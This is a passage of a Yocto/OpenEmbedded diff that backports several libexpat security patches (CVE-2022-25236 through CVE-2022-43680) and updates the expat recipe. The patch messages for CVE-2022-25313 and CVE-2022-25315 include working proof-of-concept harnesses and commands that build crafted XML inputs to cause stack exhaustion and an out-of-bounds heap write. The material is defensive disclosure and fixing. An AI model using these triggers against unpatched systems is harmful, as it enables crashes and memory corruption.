++ // by an attacker putting additional namespace separator characters
++ // into namespace declarations. That would be ambiguous and not to
++ // be expected.
++ if (parser->m_ns && (uri[len] == parser->m_namespaceSeparator)) {
++ return XML_ERROR_SYNTAX;
++ }
+ }
+ isXML = isXML && len == xmlLen;
+ isXMLNS = isXMLNS && len == xmlnsLen;
+From 2de077423fb22750ebea599677d523b53cb93b1d Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 12 Feb 2022 00:51:43 +0100
+Subject: [PATCH] tests: Cover CVE-2022-25236
+
+---
+ expat/tests/runtests.c | 30 ++++++++++++++++++++++++++++++
+ 1 file changed, 30 insertions(+)
+
+diff --git a/tests/runtests.c b/tests/runtests.c
+index d07203f2..bc5344b1 100644
+--- a/tests/runtests.c
++++ b/tests/runtests.c
+@@ -7220,6 +7220,35 @@ START_TEST(test_ns_double_colon_doctype) {
+ }
+ END_TEST
+
++START_TEST(test_ns_separator_in_uri) {
++ struct test_case {
++ enum XML_Status expectedStatus;
++ const char *doc;
++ };
++ struct test_case cases[] = {
++ {XML_STATUS_OK, "<doc xmlns='one_two' />"},
++ {XML_STATUS_ERROR, "<doc xmlns='one&#x0A;two' />"},
++ };
++
++ size_t i = 0;
++ size_t failCount = 0;
++ for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
++ XML_Parser parser = XML_ParserCreateNS(NULL, '\n');
++ XML_SetElementHandler(parser, dummy_start_element, dummy_end_element);
++ if (XML_Parse(parser, cases[i].doc, (int)strlen(cases[i].doc),
++ /*isFinal*/ XML_TRUE)
++ != cases[i].expectedStatus) {
++ failCount++;
++ }
++ XML_ParserFree(parser);
++ }
++
++ if (failCount) {
++ fail("Namespace separator handling is broken");
++ }
++}
++END_TEST
++
+ /* Control variable; the number of times duff_allocator() will successfully
+ * allocate */
+ #define ALLOC_ALWAYS_SUCCEED (-1)
+@@ -11905,6 +11934,7 @@ make_suite(void) {
+ tcase_add_test(tc_namespace, test_ns_utf16_doctype);
+ tcase_add_test(tc_namespace, test_ns_invalid_doctype);
+ tcase_add_test(tc_namespace, test_ns_double_colon_doctype);
++ tcase_add_test(tc_namespace, test_ns_separator_in_uri);
+
+ suite_add_tcase(s, tc_misc);
+ tcase_add_checked_fixture(tc_misc, NULL, basic_teardown);
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch b/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch
new file mode 100644
index 0000000000..af255e8cb5
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch
@@ -0,0 +1,131 @@
+From b12f34fe32821a69dc12ff9a021daca0856de238 Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Sat, 19 Feb 2022 23:59:25 +0000
+Subject: [PATCH] Fix build_model regression.
+
+The iterative approach in build_model failed to fill children arrays
+correctly. A preorder traversal is not required and turned out to be the
+culprit. Use an easier algorithm:
+
+Add nodes from scaffold tree starting at index 0 (root) to the target
+array whenever children are encountered. This ensures that children
+are adjacent to each other. This complies with the recursive version.
+
+Store only the scaffold index in numchildren field to prevent a direct
+processing of these children, which would require a recursive solution.
+This allows the algorithm to iterate through the target array from start
+to end without jumping back and forth, converting on the fly.
+
+Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
+---
+ lib/xmlparse.c | 79 ++++++++++++++++++++++++++------------------
+ 1 file changed, 47 insertions(+), 32 deletions(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index c479a258..84885b5a 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7373,39 +7373,58 @@ build_model(XML_Parser parser) {
+ *
+ * The iterative approach works as follows:
+ *
+- * - We use space in the target array for building a temporary stack structure
+- * while that space is still unused.
+- * The stack grows from the array's end downwards and the "actual data"
+- * grows from the start upwards, sequentially.
+- * (Because stack grows downwards, pushing onto the stack is a decrement
+- * while popping off the stack is an increment.)
++ * - We have two writing pointers, both walking up the result array; one does
++ * the work, the other creates "jobs" for its colleague to do, and leads
++ * the way:
+ *
+- * - A stack element appears as a regular XML_Content node on the outside,
+- * but only uses a single field -- numchildren -- to store the source
+- * tree node array index. These are the breadcrumbs leading the way back
+- * during pre-order (node first) depth-first traversal.
++ * - The faster one, pointer jobDest, always leads and writes "what job
++ * to do" by the other, once they reach that place in the
++ * array: leader "jobDest" stores the source node array index (relative
++ * to array dtd->scaffold) in field "numchildren".
+ *
+- * - The reason we know the stack will never grow into (or overlap with)
+- * the area with data of value at the start of the array is because
+- * the overall number of elements to process matches the size of the array,
+- * and the sum of fully processed nodes and yet-to-be processed nodes
+- * on the stack, cannot be more than the total number of nodes.
+- * It is possible for the top of the stack and the about-to-write node
+- * to meet, but that is safe because we get the source index out
+- * before doing any writes on that node.
++ * - The slower one, pointer dest, looks at the value stored in the
++ * "numchildren" field (which actually holds a source node array index
++ * at that time) and puts the real data from dtd->scaffold in.
++ *
++ * - Before the loop starts, jobDest writes source array index 0
++ * (where the root node is located) so that dest will have something to do
++ * when it starts operation.
++ *
++ * - Whenever nodes with children are encountered, jobDest appends
++ * them as new jobs, in order. As a result, tree node siblings are
++ * adjacent in the resulting array, for example:
++ *
++ * [0] root, has two children
++ * [1] first child of 0, has three children
++ * [3] first child of 1, does not have children
++ * [4] second child of 1, does not have children
++ * [5] third child of 1, does not have children
++ * [2] second child of 0, does not have children
++ *
++ * Or (the same data) presented in flat array view:
++ *
++ * [0] root, has two children
++ *
++ * [1] first child of 0, has three children
++ * [2] second child of 0, does not have children
++ *
++ * [3] first child of 1, does not have children
++ * [4] second child of 1, does not have children
++ * [5] third child of 1, does not have children
++ *
++ * - The algorithm repeats until all target array indices have been processed.
+ */
+ XML_Content *dest = ret; /* tree node writing location, moves upwards */
+ XML_Content *const destLimit = &ret[dtd->scaffCount];
+- XML_Content *const stackBottom = &ret[dtd->scaffCount];
+- XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
++ XML_Content *jobDest = ret; /* next free writing location in target array */
+ str = (XML_Char *)&ret[dtd->scaffCount];
+
+- /* Push source tree root node index onto the stack */
+- (--stackTop)->numchildren = 0;
++ /* Add the starting job, the root node (index 0) of the source tree */
++ (jobDest++)->numchildren = 0;
+
+ for (; dest < destLimit; dest++) {
+- /* Pop source tree node index off the stack */
+- const int src_node = (int)(stackTop++)->numchildren;
++ /* Retrieve source tree array index from job storage */
++ const int src_node = (int)dest->numchildren;
+
+ /* Convert item */
+ dest->type = dtd->scaffold[src_node].type;
+@@ -7427,16 +7446,12 @@ build_model(XML_Parser parser) {
+ int cn;
+ dest->name = NULL;
+ dest->numchildren = dtd->scaffold[src_node].childcnt;
+- dest->children = &dest[1];
++ dest->children = jobDest;
+
+- /* Push children to the stack
+- * in a way where the first child ends up at the top of the
+- * (downwards growing) stack, in order to be processed first. */
+- stackTop -= dest->numchildren;
++ /* Append scaffold indices of children to array */
+ for (i = 0, cn = dtd->scaffold[src_node].firstchild;
+- i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
+- (stackTop + i)->numchildren = (unsigned int)cn;
+- }
++ i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib)
++ (jobDest++)->numchildren = (unsigned int)cn;
+ }
+ }
+
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25313.patch b/meta/recipes-core/expat/expat/CVE-2022-25313.patch
new file mode 100644
index 0000000000..470d66e9dd
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25313.patch
@@ -0,0 +1,230 @@
+From 9b4ce651b26557f16103c3a366c91934ecd439ab Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:54:29 +0000
+Subject: [PATCH] Prevent stack exhaustion in build_model
+
+It is possible to trigger stack exhaustion in build_model function if
+depth of nested children in DTD element is large enough. This happens
+because build_node is a recursively called function within build_model.
+
+The code has been adjusted to run iteratively. It uses the already
+allocated heap space as temporary stack (growing from top to bottom).
+
+Output is identical to recursive version. No new fields in data
+structures were added, i.e. it keeps full API and ABI compatibility.
+Instead the numchildren variable is used to temporarily keep the
+index of items (uint vs int).
+
+Documentation and readability improvements kindly added by Sebastian.
+
+Proof of Concept:
+
+1. Compile poc binary which parses XML file line by line
+
+```
+cat > poc.c << EOF
+ #include <err.h>
+ #include <expat.h>
+ #include <stdio.h>
+
+ XML_Parser parser;
+
+ static void XMLCALL
+ dummy_element_decl_handler(void *userData, const XML_Char *name,
+ XML_Content *model) {
+ XML_FreeContentModel(parser, model);
+ }
+
+ int main(int argc, char *argv[]) {
+ FILE *fp;
+ char *p = NULL;
+ size_t s = 0;
+ ssize_t l;
+ if (argc != 2)
+ errx(1, "usage: poc poc.xml");
+ if ((parser = XML_ParserCreate(NULL)) == NULL)
+ errx(1, "XML_ParserCreate");
+ XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
+ if ((fp = fopen(argv[1], "r")) == NULL)
+ err(1, "fopen");
+ while ((l = getline(&p, &s, fp)) > 0)
+ if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
+ errx(1, "XML_Parse");
+ XML_ParserFree(parser);
+ free(p);
+ fclose(fp);
+ return 0;
+ }
+EOF
+cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c
+```
+
+2. Create XML file with a lot of nested groups in DTD element
+
+```
+cat > poc.xml.zst.b64 << EOF
+KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
+ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
+ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
+EOF
+base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
+```
+
+3. Run Proof of Concept
+
+```
+./poc poc.xml
+```
+
+Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/558/commits/9b4ce651b26557f16103c3a366c91934ecd439ab
+
+CVE: CVE-2022-25313
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 116 +++++++++++++++++++++++++++++--------------
+ 1 file changed, 79 insertions(+), 37 deletions(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..594cf12c 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7317,44 +7317,15 @@ nextScaffoldPart(XML_Parser parser) {
+ return next;
+ }
+
+-static void
+-build_node(XML_Parser parser, int src_node, XML_Content *dest,
+- XML_Content **contpos, XML_Char **strpos) {
+- DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+- dest->type = dtd->scaffold[src_node].type;
+- dest->quant = dtd->scaffold[src_node].quant;
+- if (dest->type == XML_CTYPE_NAME) {
+- const XML_Char *src;
+- dest->name = *strpos;
+- src = dtd->scaffold[src_node].name;
+- for (;;) {
+- *(*strpos)++ = *src;
+- if (! *src)
+- break;
+- src++;
+- }
+- dest->numchildren = 0;
+- dest->children = NULL;
+- } else {
+- unsigned int i;
+- int cn;
+- dest->numchildren = dtd->scaffold[src_node].childcnt;
+- dest->children = *contpos;
+- *contpos += dest->numchildren;
+- for (i = 0, cn = dtd->scaffold[src_node].firstchild; i < dest->numchildren;
+- i++, cn = dtd->scaffold[cn].nextsib) {
+- build_node(parser, cn, &(dest->children[i]), contpos, strpos);
+- }
+- dest->name = NULL;
+- }
+-}
+-
+ static XML_Content *
+ build_model(XML_Parser parser) {
++ /* Function build_model transforms the existing parser->m_dtd->scaffold
++ * array of CONTENT_SCAFFOLD tree nodes into a new array of
++ * XML_Content tree nodes followed by a gapless list of zero-terminated
++ * strings. */
+ DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+ XML_Content *ret;
+- XML_Content *cpos;
+- XML_Char *str;
++ XML_Char *str; /* the current string writing location */
+
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+@@ -7380,10 +7351,81 @@ build_model(XML_Parser parser) {
+ if (! ret)
+ return NULL;
+
+- str = (XML_Char *)(&ret[dtd->scaffCount]);
+- cpos = &ret[1];
++ /* What follows is an iterative implementation (of what was previously done
++ * recursively in a dedicated function called "build_node". The old recursive
++ * build_node could be forced into stack exhaustion from input as small as a
++ * few megabyte, and so that was a security issue. Hence, a function call
++ * stack is avoided now by resolving recursion.)
++ *
++ * The iterative approach works as follows:
++ *
++ * - We use space in the target array for building a temporary stack structure
++ * while that space is still unused.
++ * The stack grows from the array's end downwards and the "actual data"
++ * grows from the start upwards, sequentially.
++ * (Because stack grows downwards, pushing onto the stack is a decrement
++ * while popping off the stack is an increment.)
++ *
++ * - A stack element appears as a regular XML_Content node on the outside,
++ * but only uses a single field -- numchildren -- to store the source
++ * tree node array index. These are the breadcrumbs leading the way back
++ * during pre-order (node first) depth-first traversal.
++ *
++ * - The reason we know the stack will never grow into (or overlap with)
++ * the area with data of value at the start of the array is because
++ * the overall number of elements to process matches the size of the array,
++ * and the sum of fully processed nodes and yet-to-be processed nodes
++ * on the stack, cannot be more than the total number of nodes.
++ * It is possible for the top of the stack and the about-to-write node
++ * to meet, but that is safe because we get the source index out
++ * before doing any writes on that node.
++ */
++ XML_Content *dest = ret; /* tree node writing location, moves upwards */
++ XML_Content *const destLimit = &ret[dtd->scaffCount];
++ XML_Content *const stackBottom = &ret[dtd->scaffCount];
++ XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
++ str = (XML_Char *)&ret[dtd->scaffCount];
++
++ /* Push source tree root node index onto the stack */
++ (--stackTop)->numchildren = 0;
++
++ for (; dest < destLimit; dest++) {
++ /* Pop source tree node index off the stack */
++ const int src_node = (int)(stackTop++)->numchildren;
++
++ /* Convert item */
++ dest->type = dtd->scaffold[src_node].type;
++ dest->quant = dtd->scaffold[src_node].quant;
++ if (dest->type == XML_CTYPE_NAME) {
++ const XML_Char *src;
++ dest->name = str;
++ src = dtd->scaffold[src_node].name;
++ for (;;) {
++ *str++ = *src;
++ if (! *src)
++ break;
++ src++;
++ }
++ dest->numchildren = 0;
++ dest->children = NULL;
++ } else {
++ unsigned int i;
++ int cn;
++ dest->name = NULL;
++ dest->numchildren = dtd->scaffold[src_node].childcnt;
++ dest->children = &dest[1];
++
++ /* Push children to the stack
++ * in a way where the first child ends up at the top of the
++ * (downwards growing) stack, in order to be processed first. */
++ stackTop -= dest->numchildren;
++ for (i = 0, cn = dtd->scaffold[src_node].firstchild;
++ i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
++ (stackTop + i)->numchildren = (unsigned int)cn;
++ }
++ }
++ }
+
+- build_node(parser, 0, ret, &cpos, &str);
+ return ret;
+ }
+
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25314.patch b/meta/recipes-core/expat/expat/CVE-2022-25314.patch
new file mode 100644
index 0000000000..2f713ebb54
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25314.patch
@@ -0,0 +1,32 @@
+From efcb347440ade24b9f1054671e6bd05e60b4cafd Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:56:57 +0000
+Subject: [PATCH] Prevent integer overflow in copyString
+
+The copyString function is only used for encoding string supplied by
+the library user.
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/560/commits/efcb347440ade24b9f1054671e6bd05e60b4cafd
+
+CVE: CVE-2022-25314
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..a39377c2 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7412,7 +7412,7 @@ getElementType(XML_Parser parser, const ENCODING *enc, const char *ptr,
+
+ static XML_Char *
+ copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
+- int charsRequired = 0;
++ size_t charsRequired = 0;
+ XML_Char *result;
+
+ /* First determine how long the string is */
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25315.patch b/meta/recipes-core/expat/expat/CVE-2022-25315.patch
new file mode 100644
index 0000000000..a39771d28a
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25315.patch
@@ -0,0 +1,145 @@
+From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:55:46 +0000
+Subject: [PATCH] Prevent integer overflow in storeRawNames
+
+It is possible to use an integer overflow in storeRawNames for out of
+boundary heap writes. Default configuration is affected. If compiled
+with XML_UNICODE then the attack does not work. Compiling with
+-fsanitize=address confirms the following proof of concept.
+
+The problem can be exploited by abusing the m_buffer expansion logic.
+Even though the initial size of m_buffer is a power of two, eventually
+it can end up a little bit lower, thus allowing allocations very close
+to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
+names can be parsed which are almost INT_MAX in size.
+
+Unfortunately (from an attacker point of view) INT_MAX/2 is also a
+limitation in string pools. Having a tag name of INT_MAX/2 characters
+or more is not possible.
+
+Expat can convert between different encodings. UTF-16 documents which
+contain only ASCII representable characters are twice as large as their
+ASCII encoded counter-parts.
+
+The proof of concept works by taking these three considerations into
+account:
+
+1. Move the m_buffer size slightly below a power of two by having a
+ short root node <a>. This allows the m_buffer to grow very close
+ to INT_MAX.
+2. The string pooling forbids tag names longer than or equal to
+ INT_MAX/2, so keep the attack tag name smaller than that.
+3. To be able to still overflow INT_MAX even though the name is
+ limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
+ which only contains ASCII characters. UTF-16 always stores two
+ bytes per character while the tag name is converted to using only
+ one. Our attack node byte count must be a bit higher than
+ 2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
+ in sum can overflow INT_MAX.
+
+Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
+without running into INT_MAX boundary check. The string pooling is
+able to store INT_MAX/3 as tag name because the amount is below
+INT_MAX/2 limitation. And creating the sum of both eventually overflows
+in storeRawNames.
+
+Proof of Concept:
+
+1. Compile expat with -fsanitize=address.
+
+2. Create Proof of Concept binary which iterates through input
+ file 16 MB at once for better performance and easier integer
+ calculations:
+
+```
+cat > poc.c << EOF
+ #include <err.h>
+ #include <expat.h>
+ #include <stdlib.h>
+ #include <stdio.h>
+
+ #define CHUNK (16 * 1024 * 1024)
+ int main(int argc, char *argv[]) {
+ XML_Parser parser;
+ FILE *fp;
+ char *buf;
+ int i;
+
+ if (argc != 2)
+ errx(1, "usage: poc file.xml");
+ if ((parser = XML_ParserCreate(NULL)) == NULL)
+ errx(1, "failed to create expat parser");
+ if ((fp = fopen(argv[1], "r")) == NULL) {
+ XML_ParserFree(parser);
+ err(1, "failed to open file");
+ }
+ if ((buf = malloc(CHUNK)) == NULL) {
+ fclose(fp);
+ XML_ParserFree(parser);
+ err(1, "failed to allocate buffer");
+ }
+ i = 0;
+ while (fread(buf, CHUNK, 1, fp) == 1) {
+ printf("iteration %d: XML_Parse returns %d\n", ++i,
+ XML_Parse(parser, buf, CHUNK, XML_FALSE));
+ }
+ free(buf);
+ fclose(fp);
+ XML_ParserFree(parser);
+ return 0;
+ }
+EOF
+gcc -fsanitize=address -lexpat -o poc poc.c
+```
+
+3. Construct specially prepared UTF-16 XML file:
+
+```
+dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
+echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
+echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
+iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
+```
+
+4. Run proof of concept:
+
+```
+./poc poc-utf16.xml
+```
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/559/commits/eb0362808b4f9f1e2345a0cf203b8cc196d776d9
+
+CVE: CVE-2022-25315
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ lib/xmlparse.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..f34d6ab5 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {
+ while (tag) {
+ int bufSize;
+ int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
++ size_t rawNameLen;
+ char *rawNameBuf = tag->buf + nameLen;
+ /* Stop if already stored. Since m_tagStack is a stack, we can stop
+ at the first entry that has already been copied; everything
+@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {
+ /* For re-use purposes we need to ensure that the
+ size of tag->buf is a multiple of sizeof(XML_Char).
+ */
+- bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
++ rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
++ /* Detect and prevent integer overflow. */
++ if (rawNameLen > (size_t)INT_MAX - nameLen)
++ return XML_FALSE;
++ bufSize = nameLen + (int)rawNameLen;
+ if (bufSize > tag->bufEnd - tag->buf) {
+ char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
+ if (temp == NULL)
diff --git a/meta/recipes-core/expat/expat/CVE-2022-40674.patch b/meta/recipes-core/expat/expat/CVE-2022-40674.patch
new file mode 100644
index 0000000000..8b95f5f198
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-40674.patch
@@ -0,0 +1,53 @@
+From 4a32da87e931ba54393d465bb77c40b5c33d343b Mon Sep 17 00:00:00 2001
+From: Rhodri James <rhodri@wildebeest.org.uk>
+Date: Wed, 17 Aug 2022 18:26:18 +0100
+Subject: [PATCH] Ensure raw tagnames are safe exiting internalEntityParser
+
+It is possible to concoct a situation in which parsing is
+suspended while substituting in an internal entity, so that
+XML_ResumeParser directly uses internalEntityProcessor as
+its processor. If the subsequent parse includes some unclosed
+tags, this will return without calling storeRawNames to ensure
+that the raw versions of the tag names are stored in memory other
+than the parse buffer itself. If the parse buffer is then changed
+or reallocated (for example if processing a file line by line),
+badness will ensue.
+
+This patch ensures storeRawNames is always called when needed
+after calling doContent. The earlier call do doContent does
+not need the same protection; it only deals with entity
+substitution, which cannot leave unbalanced tags, and in any
+case the raw names will be pointing into the stored entity
+value not the parse buffer.
+
+Upstream-Status: Backport [https://github.com/libexpat/libexpat/commit/4a32da87e931ba54393d465bb77c40b5c33d343b]
+CVE: CVE-2022-40674
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+ expat/lib/xmlparse.c | 13 +++++++++----
+ 1 file changed, 9 insertions(+), 4 deletions(-)
+
+Index: expat/lib/xmlparse.c
+===================================================================
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5657,10 +5657,15 @@ internalEntityProcessor(XML_Parser parse
+ {
+ parser->m_processor = contentProcessor;
+ /* see externalEntityContentProcessor vs contentProcessor */
+- return doContent(parser, parser->m_parentParser ? 1 : 0, parser->m_encoding,
+- s, end, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer,
+- XML_ACCOUNT_DIRECT);
++ result = doContent(parser, parser->m_parentParser ? 1 : 0,
++ parser->m_encoding, s, end, nextPtr,
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer,
++ XML_ACCOUNT_DIRECT);
++ if (result == XML_ERROR_NONE) {
++ if (! storeRawNames(parser))
++ return XML_ERROR_NO_MEMORY;
++ }
++ return result;
+ }
+ }
+
diff --git a/meta/recipes-core/expat/expat/CVE-2022-43680.patch b/meta/recipes-core/expat/expat/CVE-2022-43680.patch
new file mode 100644
index 0000000000..6f93bc3ed7
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-43680.patch
@@ -0,0 +1,33 @@
+From 5290462a7ea1278a8d5c0d5b2860d4e244f997e4 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 20 Sep 2022 02:44:34 +0200
+Subject: [PATCH] lib: Fix overeager DTD destruction in
+ XML_ExternalEntityParserCreate
+
+CVE: CVE-2022-43680
+Upstream-Status: Backport [https://github.com/libexpat/libexpat/commit/5290462a7ea1278a8d5c0d5b2860d4e244f997e4.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comments: Hunk refreshed
+---
+ lib/xmlparse.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index aacd6e7fc..57bf103cc 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -1035,6 +1035,14 @@ parserCreate(const XML_Char *encodingNam
+ parserInit(parser, encodingName);
+
+ if (encodingName && ! parser->m_protocolEncodingName) {
++ if (dtd) {
++ // We need to stop the upcoming call to XML_ParserFree from happily
++ // destroying parser->m_dtd because the DTD is shared with the parent
++ // parser and the only guard that keeps XML_ParserFree from destroying
++ // parser->m_dtd is parser->m_isParamEntity but it will be set to
++ // XML_TRUE only later in XML_ExternalEntityParserCreate (or not at all).
++ parser->m_dtd = NULL;
++ }
+ XML_ParserFree(parser);
+ return NULL;
+ }
diff --git a/meta/recipes-core/expat/expat/libtool-tag.patch b/meta/recipes-core/expat/expat/libtool-tag.patch
index 0a0aed23e5..c59ccbbede 100644
--- a/meta/recipes-core/expat/expat/libtool-tag.patch
+++ b/meta/recipes-core/expat/expat/libtool-tag.patch
@@ -1,30 +1,27 @@
-From 10342e6b600858b091bc7771e454d9e06af06410 Mon Sep 17 00:00:00 2001
-From: Khem Raj <raj.khem@gmail.com>
-Date: Thu, 2 Nov 2017 18:20:57 +0800
+From da433dbe79f2d4d5d7d79869c669594c99c5de9c Mon Sep 17 00:00:00 2001
+From: Jasper Orschulko <jasper@fancydomain.eu>
+Date: Wed, 16 Jun 2021 19:00:30 +0200
Subject: [PATCH] Add CC tag to build
-Add CC tag to build
-
Upstream-Status: Pending
-Signed-off-by: Khem Raj <raj.khem@gmail.com>
-Signed-off-by: Dengke Du <dengke.du@windriver.com>
+Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu>
---
- Makefile.in | 2 +-
+ Makefile.am | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
-diff --git a/Makefile.in b/Makefile.in
-index 9560a95..d444bd6 100644
---- a/Makefile.in
-+++ b/Makefile.in
-@@ -319,7 +319,7 @@ LIBCURRENT = @LIBCURRENT@
- LIBOBJS = @LIBOBJS@
- LIBREVISION = @LIBREVISION@
- LIBS = @LIBS@
--LIBTOOL = @LIBTOOL@
-+LIBTOOL = @LIBTOOL@ --tag CC
- LIPO = @LIPO@
- LN_S = @LN_S@
- LTLIBOBJS = @LTLIBOBJS@
+diff --git a/Makefile.am b/Makefile.am
+index 5e1d37dd..f7a6dece 100644
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -36,7 +36,7 @@ AUTOMAKE_OPTIONS = \
+ subdir-objects
+
+ ACLOCAL_AMFLAGS = -I m4
+-LIBTOOLFLAGS = --verbose
++LIBTOOLFLAGS = --verbose --tag=CC
+
+ SUBDIRS = lib # lib goes first to build first
+ if WITH_EXAMPLES
--
-2.7.4
+2.32.0
diff --git a/meta/recipes-core/expat/expat_2.2.9.bb b/meta/recipes-core/expat/expat_2.2.9.bb
index 8f3db41352..8a5006e59a 100644
--- a/meta/recipes-core/expat/expat_2.2.9.bb
+++ b/meta/recipes-core/expat/expat_2.2.9.bb
@@ -1,22 +1,35 @@
SUMMARY = "A stream-oriented XML parser library"
DESCRIPTION = "Expat is an XML parser library written in C. It is a stream-oriented parser in which an application registers handlers for things the parser might find in the XML document (like start tags)"
-HOMEPAGE = "http://expat.sourceforge.net/"
+HOMEPAGE = "https://github.com/libexpat/libexpat"
SECTION = "libs"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=5b8620d98e49772d95fc1d291c26aa79"
-SRC_URI = "${SOURCEFORGE_MIRROR}/expat/expat-${PV}.tar.bz2 \
+SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https;branch=master \
+ file://CVE-2013-0340.patch \
+ file://CVE-2021-45960.patch \
+ file://CVE-2021-46143.patch \
+ file://CVE-2022-22822-27.patch \
+ file://CVE-2022-23852.patch \
+ file://CVE-2022-23990.patch \
+ file://CVE-2022-25235.patch \
+ file://CVE-2022-25236.patch \
+ file://CVE-2022-25313.patch \
+ file://CVE-2022-25313-regression.patch \
+ file://CVE-2022-25314.patch \
+ file://CVE-2022-25315.patch \
file://libtool-tag.patch \
- "
+ file://CVE-2022-40674.patch \
+ file://CVE-2022-43680.patch \
+ "
-SRC_URI[md5sum] = "875a2c2ff3e8eb9e5a5cd62db2033ab5"
-SRC_URI[sha256sum] = "f1063084dc4302a427dabcca499c8312b3a32a29b7d2506653ecc8f950a9a237"
+SRCREV = "a7bc26b69768f7fb24f0c7976fae24b157b85b13"
inherit autotools lib_package
-do_configure_prepend () {
- rm -f ${S}/conftools/libtool.m4
-}
+S = "${WORKDIR}/git/expat"
BBCLASSEXTEND = "native nativesdk"
+
+CVE_PRODUCT = "expat libexpat"
diff --git a/meta/recipes-core/fts/fts_1.2.7.bb b/meta/recipes-core/fts/fts_1.2.7.bb
index 589ae0e916..d3b0f31eda 100644
--- a/meta/recipes-core/fts/fts_1.2.7.bb
+++ b/meta/recipes-core/fts/fts_1.2.7.bb
@@ -3,13 +3,14 @@
